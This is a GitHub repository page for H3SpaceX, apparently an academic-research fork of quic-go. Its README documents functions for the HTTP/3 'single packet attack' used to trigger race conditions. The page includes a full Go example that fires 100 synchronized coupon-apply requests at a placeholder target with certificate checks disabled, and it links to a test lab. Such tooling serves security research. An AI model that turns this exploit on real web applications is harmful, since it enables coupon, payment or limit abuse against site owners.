Skip to content
/ H3SpaceX Public

Library of Exploiting Last Frame Synchronization (also know as Single Packet Attack) on HTTP/3 - Manipulated version of quic-go lib

License

MIT license
0 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

nxenon/H3SpaceX

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

22 Commits
.circleci
.circleci
 
 
.clusterfuzzlite
.clusterfuzzlite
 
 
.githooks
.githooks
 
 
docs
docs
 
 
example
example
 
 
exploit
exploit
 
 
fuzzing
fuzzing
 
 
http3
http3
 
 
internal
internal
 
 
interop
interop
 
 
logging
logging
 
 
qlog
qlog
 
 
quicvarint
quicvarint
 
 
testutils
testutils
 
 
.gitignore
.gitignore
 
 
.golangci.yml
.golangci.yml
 
 
Changelog.md
Changelog.md
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
SECURITY.md
SECURITY.md
 
 
buffer_pool.go
buffer_pool.go
 
 
buffer_pool_test.go
buffer_pool_test.go
 
 
client.go
client.go
 
 
client_test.go
client_test.go
 
 
closed_conn.go
closed_conn.go
 
 
closed_conn_test.go
closed_conn_test.go
 
 
codecov.yml
codecov.yml
 
 
config.go
config.go
 
 
config_test.go
config_test.go
 
 
conn_id_generator.go
conn_id_generator.go
 
 
conn_id_generator_test.go
conn_id_generator_test.go
 
 
conn_id_manager.go
conn_id_manager.go
 
 
conn_id_manager_test.go
conn_id_manager_test.go
 
 
connection.go
connection.go
 
 
connection_test.go
connection_test.go
 
 
connection_timer.go
connection_timer.go
 
 
connection_timer_test.go
connection_timer_test.go
 
 
crypto_stream.go
crypto_stream.go
 
 
crypto_stream_manager.go
crypto_stream_manager.go
 
 
crypto_stream_manager_test.go
crypto_stream_manager_test.go
 
 
crypto_stream_test.go
crypto_stream_test.go
 
 
datagram_queue.go
datagram_queue.go
 
 
datagram_queue_test.go
datagram_queue_test.go
 
 
errors.go
errors.go
 
 
frame_sorter.go
frame_sorter.go
 
 
frame_sorter_test.go
frame_sorter_test.go
 
 
framer.go
framer.go
 
 
framer_test.go
framer_test.go
 
 
go.mod
go.mod
 
 
go.sum
go.sum
 
 
interface.go
interface.go
 
 
mock_ack_frame_source_test.go
mock_ack_frame_source_test.go
 
 
mock_batch_conn_test.go
mock_batch_conn_test.go
 
 
mock_conn_runner_test.go
mock_conn_runner_test.go
 
 
mock_crypto_data_handler_test.go
mock_crypto_data_handler_test.go
 
 
mock_crypto_stream_test.go
mock_crypto_stream_test.go
 
 
mock_frame_source_test.go
mock_frame_source_test.go
 
 
mock_mtu_discoverer_test.go
mock_mtu_discoverer_test.go
 
 
mock_packer_test.go
mock_packer_test.go
 
 
mock_packet_handler_manager_test.go
mock_packet_handler_manager_test.go
 
 
mock_packet_handler_test.go
mock_packet_handler_test.go
 
 
mock_packetconn_test.go
mock_packetconn_test.go
 
 
mock_quic_conn_test.go
mock_quic_conn_test.go
 
 
mock_raw_conn_test.go
mock_raw_conn_test.go
 
 
mock_receive_stream_internal_test.go
mock_receive_stream_internal_test.go
 
 
mock_sealing_manager_test.go
mock_sealing_manager_test.go
 
 
mock_send_conn_test.go
mock_send_conn_test.go
 
 
mock_send_stream_internal_test.go
mock_send_stream_internal_test.go
 
 
mock_sender_test.go
mock_sender_test.go
 
 
mock_stream_getter_test.go
mock_stream_getter_test.go
 
 
mock_stream_internal_test.go
mock_stream_internal_test.go
 
 
mock_stream_manager_test.go
mock_stream_manager_test.go
 
 
mock_stream_sender_test.go
mock_stream_sender_test.go
 
 
mock_token_store_test.go
mock_token_store_test.go
 
 
mock_unpacker_test.go
mock_unpacker_test.go
 
 
mockgen.go
mockgen.go
 
 
mtu_discoverer.go
mtu_discoverer.go
 
 
mtu_discoverer_test.go
mtu_discoverer_test.go
 
 
multiplexer.go
multiplexer.go
 
 
multiplexer_test.go
multiplexer_test.go
 
 
oss-fuzz.sh
oss-fuzz.sh
 
 
packet_handler_map.go
packet_handler_map.go
 
 
packet_handler_map_test.go
packet_handler_map_test.go
 
 
packet_packer.go
packet_packer.go
 
 
packet_packer_test.go
packet_packer_test.go
 
 
packet_unpacker.go
packet_unpacker.go
 
 
packet_unpacker_test.go
packet_unpacker_test.go
 
 
quic_suite_test.go
quic_suite_test.go
 
 
receive_stream.go
receive_stream.go
 
 
receive_stream_test.go
receive_stream_test.go
 
 
retransmission_queue.go
retransmission_queue.go
 
 
retransmission_queue_test.go
retransmission_queue_test.go
 
 
send_conn.go
send_conn.go
 
 
send_conn_test.go
send_conn_test.go
 
 
send_queue.go
send_queue.go
 
 
send_queue_test.go
send_queue_test.go
 
 
send_stream.go
send_stream.go
 
 
send_stream_test.go
send_stream_test.go
 
 
server.go
server.go
 
 
server_test.go
server_test.go
 
 

Repository files navigation

H3SpaceX

H3SpaceX library is manipulated version of quic-go to enable the Single Packet Attack (Last Frame Synchronization) in HTTP/3 (QUIC). This library was part of an academic research with title of Exploiting Race Conditions in Web Applications with HTTP/3.

Library Usage (how to exploit last frame synchronization - also known as single packet attack on HTTP/3)

There are two methods for exploiting last frame synchronization:

  • Function SendRequestsWithLastFrameSynchronizationMethod:
  • This function is for requests which have body!
  • Function parameters:
    • first param gets QUIC connection (type: quic.Connection)
    • second param gets an array of requests which need to be sent.
    • third param is for number of bytes which needs to be kept from end of the DATA frame. (at least & best 1)
    • fourth param is for number of milliseconds which library waits before sending last DATA frames
    • fifth param is for setting or unsetting Content-Length header. If false, the Content-Header will not be set, unless you set it directly in requests headers
  • Function return:
    • a map of requests with value of their response
func SendRequestsWithLastFrameSynchronizationMethod(quicConn quic.Connection,
	allRequests []*http.Request,
	lastByteNum int,
	sleepMillisecondsBeforeSendingLastByte int,
	setContentLength bool,
) map[*http.Request]*http.Response
  • Function SendGetNoBodyRequestsWithSinglePacketAttackMethod:
  • This function is for requests which do *not* have body!
  • Function parameters:
    • first param gets QUIC connection (type: quic.Connection)g
    • second param gets an array of requests which need to be sent.
  • Function return:
    • a map of requests with value of their response
func SendGetNoBodyRequestsWithSinglePacketAttackMethod(quicConn quic.Connection,
	allRequests []*http.Request,
) map[*http.Request]*http.Response

Installation

go mod init PROJECT_NAME
go get github.com/nxenon/h3spacex
Write the code (exploit) then run following command (to include all dependencies in go.mod):
go mod tidy

Steps to Call Functions

  • Import libraries
  • Create TLS config
  • Create QUIC config
  • create a list of requests (use http3.GetRequestObject function) and append them into requests list
  • Establish QUIC connection
  • Call http3.SendRequestsWithLastFrameSynchronizationMethod or http3.SendGetNoBodyRequestsWithSinglePacketAttackMethod methods based on your needs
package main

import (
	"crypto/tls"
	"fmt"
	"strings"

	"context"
	"github.com/nxenon/h3spacex"
	"github.com/nxenon/h3spacex/http3"
	"io"
	"net/http"
	"os"
	"time"
)

func main() {
	tlsConf := &tls.Config{
		InsecureSkipVerify: true,
		NextProtos:         []string{http3.NextProtoH3},
	}

	quicConf := &quic.Config{
		MaxIdleTimeout:  10 * time.Second,
		KeepAlivePeriod: 10 * time.Millisecond,
	}

	var allRequests []*http.Request

	headers := map[string]string{
		"Cookie":       "x=y",
		"Content-Type": "application/json", // sample
	}

	reqBody := "{\"couponValue\":\"Coupon1\"}"

	for i := 0; i < 100; i++ { // 100 requests
		req, err2 := http3.GetRequestObject("https://DOMAIN.COM/api/cart/apply_coupon", "POST", headers, []byte(reqBody))
		if err2 != nil {
			fmt.Println("Error creating request: ", err2)
			continue
		}
		allRequests = append(allRequests, &req)
	}

	dialAddress := "IP:PORT" // destination IP address and UDP port
	ctx := context.Background()
	quicConn, err := quic.DialAddr(ctx, dialAddress, tlsConf, quicConf)
	if err != nil {
		fmt.Printf("Error Connecting to %s. Erorr: %s", dialAddress, err)
		os.Exit(1)
	}

	allResponses := http3.SendRequestsWithLastFrameSynchronizationMethod(quicConn, allRequests, 1, 150, true)

	for req, res := range allResponses {
		fmt.Printf("for request to %s\n", req.URL)
		fmt.Println("+---Headers---+")
		fmt.Printf("Status Code: %d\n", res.StatusCode)
		for key, value := range res.Header {
			fmt.Printf("%s: %s\n", key, value[0])
		}
		fmt.Println("+---Body---+")
		body, err3 := io.ReadAll(res.Body)
		if err3 != nil {
			fmt.Println("Error reading response body:", err3)
			continue
		}
		fmt.Println(string(body))

	}
}

Exploits Sample

See Exploit Directory. It contains:

Lab (HTTP/2/3 Web Application)

For testing exploits see Rc-H3-WebApp repo.

References

About

Library of Exploiting Last Frame Synchronization (also know as Single Packet Attack) on HTTP/3 - Manipulated version of quic-go lib

Topics

http3 race-condition single-packet-attack last-frame-synchronization

Resources

Readme

License

MIT license

Security policy

Security policy
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases 1

v0.1.0 Latest
Jan 25, 2025

Languages